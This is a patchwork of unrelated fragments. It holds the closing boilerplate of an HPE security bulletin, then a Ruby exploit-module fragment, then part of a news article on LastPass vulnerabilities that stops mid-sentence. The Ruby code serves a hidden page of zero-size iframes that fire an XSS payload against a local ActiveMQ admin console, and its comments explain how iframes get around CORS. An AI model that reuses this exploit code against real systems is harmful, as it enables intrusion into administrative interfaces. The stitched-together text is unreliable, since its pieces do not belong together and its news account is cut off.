**Note:** A valid HPE Passport account is needed to download the patches. Please contact HPE Technical Support for assistance.

HISTORY
Version: 1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact the normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com.

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

```ruby
    # Tail of the module's request handler: `cli` is the connected client and
    # `target` (the URL carrying the XSS payload) is assembled earlier in the
    # method, outside the fragment shown here.
    iframe_injection = ""
    # done so that we can ensure that we hit our payload; since iframes load very fast, we need a few
    (1..20).step(1) do |n|
      iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
    end

    # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
    # and the response is received in the page (even though we can't access it due to SOP) which then fires the XSS
    # Ruby string interpolation needs #{...}; a bare "#target" would be emitted literally.
    html_content = %Q|<html><body><iframe src="#{target}" width="0" height="0"></iframe>#{iframe_injection}</body></html>|
    print_status("Sending exploit...")
    send_response_html(cli, html_content)
    handler(cli)
  end
end
```

LastPass wrote about the vulnerability on Wednesday and said that a fix is already out for Firefox users.

Google security researcher Tavis Ormandy first discovered the issue. When examining the password manager, he tweeted on Tuesday, "Are people really using this lastpass thing? I took a quick look and can see a bunch of obvious critical problems. I'll send a report asap."

Any vulnerability with LastPass could pose a big risk for users. The popular software is supposed to securely store and autofill all the passwords users have for their different sites.

Ormandy isn't the only security researcher to find flaws with the password manager. On Wednesday, Mathias Karlsson at Detectify Labs said that he had also managed to hack LastPass -- in this case, to steal user passwords.

He did so by exploiting a bug in the password manager's Chrome browser extension, Karlsson

InfoWorld Security